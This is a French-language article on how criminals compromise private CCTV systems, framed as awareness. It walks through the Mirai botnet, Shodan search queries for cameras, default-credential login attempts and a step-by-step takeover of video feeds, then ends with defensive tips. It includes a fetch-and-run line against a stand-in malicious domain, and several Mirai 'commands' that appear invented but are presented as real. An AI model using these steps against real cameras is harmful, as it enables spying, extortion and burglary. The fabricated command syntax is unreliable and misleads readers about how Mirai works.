Comment les Cybercriminels Peuvent Cibler les Systèmes de Vidéosurveillance Privée

Fonctionnement de Mirai :

• Scan de l’Internet : Mirai scanne continuellement l’Internet pour trouver des dispositifs IoT vulnérables, notamment des caméras de sécurité, des routeurs, et des enregistreurs numériques (DVR).
• Exploitation des Identifiants par Défaut : Mirai tente de se connecter en utilisant une liste de combinaisons d’identifiants par défaut communs tels que admin/admin ou root/1234. Si l’accès est obtenu, le dispositif est compromis.
• Intégration au Botnet : Une fois infecté, le dispositif est ajouté au botnet Mirai, recevant des commandes de l’attaquant pour exécuter diverses tâches malveillantes.

Exécution de Commandes Malveillantes par un Botnet Mirai

Lorsqu’un dispositif IoT est infecté par Mirai, il devient un « bot » au sein du réseau de dispositifs compromis, appelé botnet. Ce botnet est contrôlé par des attaquants via un serveur de commande et de contrôle (C&C). Voici un aperçu détaillé des commandes que les attaquants peuvent envoyer à ces bots pour exécuter diverses tâches malveillantes :

Lancer des Attaques DDoS (Distributed Denial of Service)

Les attaques DDoS sont l’une des principales fonctions des botnets comme Mirai. Elles consistent à inonder un serveur cible avec un trafic massif pour le rendre indisponible. Voici quelques exemples de commandes DDoS utilisées par Mirai :

• UDP Flood : Inonde la cible avec des paquets UDP (User Datagram Protocol) non sollicités, ce qui peut saturer la bande passante ou épuiser les ressources du serveur. Exemple : attack udp 192.168.1.100 80 60 — Inonde l’adresse IP 192.168.1.100 sur le port 80 pendant 60 secondes.

• TCP SYN Flood : Envoie des requêtes de connexion TCP sans jamais compléter la connexion, ce qui consomme les ressources de la cible.

  Exemple : attack syn 192.168.1.100 80 120 — Lance une attaque TCP SYN flood sur l’adresse IP 192.168.1.100 sur le port 80 pendant 120 secondes.

• HTTP Flood : Simule des requêtes HTTP légitimes pour surcharger les serveurs web. Exemple : attack http http://example.com 90 10 — Lance une attaque HTTP flood sur http://example.com pendant 90 secondes avec 10 threads.

Scan et Propagation

Mirai scanne activement l’Internet à la recherche d’autres dispositifs vulnérables pour les intégrer au botnet. Les commandes de scan sont utilisées pour découvrir et infecter de nouveaux dispositifs.

• Scan de ports spécifiques : Mirai peut être commandé pour scanner des ports spécifiques afin de trouver des services vulnérables. 

Téléchargement et Exécution de Malware Additionnel

Les attaquants peuvent utiliser les bots pour télécharger et exécuter d’autres logiciels malveillants, augmentant ainsi leur contrôle sur les dispositifs infectés ou introduisant de nouvelles fonctionnalités malveillantes.

• Téléchargement de fichiers : Mirai peut être commandé pour télécharger des fichiers supplémentaires à partir d’un serveur distant. Exemple : download http://maliciousdomain.com/malware.sh /tmp/malware.sh — Télécharge un script malveillant depuis http://maliciousdomain.com et le stocke dans /tmp/malware.sh.

• Exécution de commandes shell : Une fois le fichier téléchargé, Mirai peut exécuter des commandes shell pour lancer le fichier. Exemple : exec /tmp/malware.sh — Exécute le script malveillant téléchargé.

Manipulation des Réseaux et de la Configuration

Mirai permet également aux attaquants de manipuler la configuration réseau des dispositifs compromis pour échapper à la détection, se maintenir sur le réseau, ou préparer d’autres attaques.

• Changer la configuration du réseau : Les attaquants peuvent modifier les paramètres réseau du dispositif pour rediriger le trafic ou contourner les pare-feu.  Exemple : network config change_dns 8.8.8.8 — Change les paramètres DNS pour rediriger tout le trafic vers le serveur DNS de Google.

• Configurer des proxies : Mirai peut configurer des dispositifs pour agir en tant que proxies, relayant le trafic malveillant ou permettant des attaques anonymisées. Exemple : setup proxy 8080 — Configure le dispositif pour agir en tant que proxy sur le port 8080.

Accès et Surveillance des Dispositifs Compromis

• Mirai peut-être utilisé pour accéder à des données sensibles ou surveiller les dispositifs infectés. Exemple : scan port 23 — Scanne les dispositifs utilisant le port 23 (Telnet), souvent utilisé par les appareils IoT.
• Scan d’adresses IP spécifiques : Mirai peut cibler des plages d’adresses IP pour localiser des dispositifs vulnérables. Exemple : scan range 192.168.1.0 192.168.1.255 — Scanne toutes les adresses IP de la plage 192.168.1.0 à 192.168.1.255.

• Capturer des paquets : Les attaquants peuvent capturer des paquets de données circulant sur le réseau pour voler des informations telles que les identifiants de connexion. Exemple : packet capture eth0 60 — Capture les paquets sur l’interface eth0 pendant 60 secondes.

• Surveillance vidéo : Si le botnet a compromis des dispositifs de vidéosurveillance, il peut accéder aux flux vidéo en direct. Exemple : stream video 192.168.1.101 — Accède au flux vidéo de la caméra à l’adresse IP 192.168.1.101.

Utilisation de Shodan.io pour Identifier les Dispositifs de Vidéosurveillance Vulnérables

Shodan.io est souvent décrit comme le « Google pour les hackers ». Il s’agit d’un moteur de recherche conçu pour indexer les appareils connectés à Internet. Contrairement aux moteurs de recherche traditionnels, Shodan répertorie les appareils eux-mêmes, y compris leurs ports ouverts, leurs interfaces d’administration, et les services qu’ils exposent.

Étapes pour Utiliser Shodan.io :

1. Créer un Compte Shodan : La première étape consiste à créer un compte sur Shodan.io. Bien que de nombreuses fonctionnalités soient accessibles gratuitement, certaines recherches avancées nécessitent un abonnement payant.

2. Recherches Ciblées pour la Vidéosurveillance : Les attaquants peuvent utiliser des requêtes spécifiques pour cibler les dispositifs de vidéosurveillance. Par exemple :

   • camera : pour trouver des caméras connectées.
   • DVR ou NVR : pour trouver des enregistreurs vidéo numériques.
   • port:554 : pour cibler les dispositifs utilisant le protocole RTSP, couramment utilisé pour le streaming vidéo.
   • product:"Hikvision" : pour cibler des caméras de la marque Hikvision.
   • geo:48.8566,2.3522 : pour cibler des dispositifs dans une zone géographique spécifique, comme Paris.

3. Affichage des Détails des Dispositifs : Shodan affiche des informations telles que l’adresse IP, l’emplacement, le fournisseur de services, le logiciel utilisé, et parfois même une capture d’écran de l’interface d’administration. Ces détails permettent aux attaquants de cibler des dispositifs spécifiques avec des failles de sécurité connues.

4. Recherche d’Interfaces Non Sécurisées : Les attaquants peuvent rechercher des dispositifs avec des interfaces de gestion accessibles via HTTP ou HTTPS. Une fois une interface découverte, l’attaquant peut essayer de se connecter en utilisant des identifiants par défaut ou exploiter des vulnérabilités connues.

Prendre le Contrôle des Systèmes de Vidéosurveillance

Une fois qu’un dispositif de vidéosurveillance vulnérable a été identifié via Shodan, les cybercriminels peuvent suivre un processus précis pour prendre le contrôle et visionner les flux vidéo privés.

Étapes pour Compromettre un Dispositif de Vidéosurveillance :

1. Accéder à l’Interface de Gestion : En utilisant l’adresse IP du dispositif trouvée via Shodan, l’attaquant peut tenter de se connecter à l’interface de gestion du dispositif en utilisant un navigateur web. Les interfaces de gestion sont souvent accessibles via des adresses URL telles que http://<adresse_ip> ou https://<adresse_ip>.

2. Essai d’Identifiants par Défaut : De nombreux dispositifs IoT sont livrés avec des identifiants par défaut qui ne sont jamais changés par les utilisateurs. L’attaquant peut essayer une liste de combinaisons courantes telles que admin/admin, user/user, root/123456. Cette méthode fonctionne souvent en raison de la négligence des utilisateurs à modifier les paramètres par défaut.

3. Utilisation de Scripts d’Exploitation : Si les identifiants par défaut ne fonctionnent pas, l’attaquant peut utiliser des scripts d’exploitation qui tirent parti des vulnérabilités spécifiques au firmware ou au logiciel du dispositif. Par exemple, certaines caméras Hikvision avaient une vulnérabilité qui permettait de contourner l’authentification et d’accéder directement aux flux vidéo.

4. Accès au Flux Vidéo : Une fois connecté, l’attaquant peut accéder aux flux vidéo en direct. La plupart des interfaces de gestion permettent de visualiser les caméras en temps réel, de contrôler les mouvements de la caméra (pour les modèles PTZ – Pan-Tilt-Zoom), et d’accéder aux enregistrements stockés.

5. Modification des Paramètres de Sécurité : L’attaquant peut modifier les paramètres de sécurité pour désactiver les alertes, changer les mots de passe pour empêcher l’accès légitime par les propriétaires, ou configurer le dispositif pour envoyer des flux vidéo vers des serveurs distants contrôlés par l’attaquant.

6. Évasion de Détection : Pour éviter d’être détecté, l’attaquant peut configurer la caméra pour continuer de fonctionner normalement tout en envoyant un flux parallèle. Cela peut être fait en configurant des règles de redirection réseau ou en installant des logiciels malveillants sur le dispositif.

Marques de Systèmes de Vidéosurveillance Souvent Ciblées

Certaines marques de systèmes de vidéosurveillance sont plus vulnérables en raison de leur large diffusion et de faiblesses connues dans leurs configurations de sécurité :

• Hikvision : Souvent ciblée en raison de son large déploiement mondial. Les vulnérabilités incluent des failles dans le firmware qui permettent l’accès sans aucune authentification.
• Dahua : Connue pour des failles similaires à celles de Hikvision. Dahua a été impliquée dans plusieurs incidents de sécurité où des attaquants ont exploité des défauts de configuration.
• Netgear : Les systèmes de surveillance Netgear sont vulnérables aux attaques de mot de passe par défaut et aux failles de sécurité dans les interfaces de gestion.
• Foscam : Connu pour des problèmes de sécurité liés à la gestion des sessions et à des défauts d’authentification.
• Linksys : Les dispositifs de surveillance de Linksys sont vulnérables aux attaques qui exploitent les interfaces de gestion non sécurisées.

Cas d’Utilisation Malveillante des Flux Vidéo

Les cybercriminels peuvent utiliser les flux de vidéosurveillance privés pour diverses activités malveillantes :

• Surveillance et Espionnage : L’accès non autorisé aux flux vidéo permet aux attaquants de surveiller les activités quotidiennes des résidents, compromettant ainsi leur vie privée.
• Chantage et Extorsion : Les séquences vidéo capturées peuvent être utilisées pour le chantage, menaçant de rendre publiques des vidéos privées ou compromettantes.
• Planification de Cambriolages : En surveillant les flux vidéo, les attaquants peuvent collecter des informations sur les habitudes des résidents, identifier les périodes où la maison est vide, et désactiver les alarmes pour faciliter les cambriolages.
• Revente des Données Vidéo : Les vidéos peuvent être vendues sur des forums clandestins ou utilisées pour des campagnes de surveillance industrielle ou politique.

Mesures de Sécurité pour Protéger les Systèmes de Vidéosurveillance

Pour protéger les systèmes de vidéosurveillance contre les attaques :

1. Changer les Identifiants par Défaut : Modifiez immédiatement les identifiants par défaut après l’installation. Utilisez des mots de passe complexes et uniques.
2. Mettre à Jour le Firmware : Les fabricants publient régulièrement des mises à jour de firmware pour corriger les failles de sécurité. Assurez-vous que vos dispositifs sont toujours à jour.
3. Utiliser un Réseau Sécurisé : Séparez les dispositifs de vidéosurveillance du réseau principal. Utilisez des VLANs pour segmenter les réseaux et limiter les accès.
4. Désactiver les Fonctions Inutiles : Si l’accès à distance n’est pas nécessaire, désactivez-le pour réduire les points d’entrée potentiels pour les attaquants.
5. Utiliser des VPN pour l’Accès à Distance : Configurez des VPN pour sécuriser l’accès à distance aux flux vidéo. Cela ajoute une couche de protection contre les intrusions.
6. Surveillance Active : Mettez en place des systèmes de détection d’intrusion qui surveillent les tentatives d’accès non autorisées et alertent les utilisateurs.

Conclusion

Les systèmes de vidéosurveillance connectés offrent une commodité et une sécurité accrues, mais ils présentent également des risques importants si les mesures de sécurité ne sont pas prises au sérieux. Les botnets comme Mirai exploitent ces faiblesses pour accéder aux flux vidéo privés, compromettant la vie privée des utilisateurs. En comprenant comment ces attaques sont menées et en prenant des mesures proactives pour sécuriser les dispositifs, les utilisateurs peuvent se protéger contre les intrusions non autorisées et préserver la confidentialité de leurs environnements de surveillance.

Avertissement Final

Les informations présentées ici sont destinées uniquement à des fins de sensibilisation et d’éducation. Toute tentative de reproduction des méthodes décrites à des fins malveillantes est illégale et contraire à l’éthique. La protection de la vie privée et de la sécurité des informations est une responsabilité que chacun doit prendre au sérieux. Agissez de manière responsable, protégez vos dispositifs et respectez les lois en vigueur.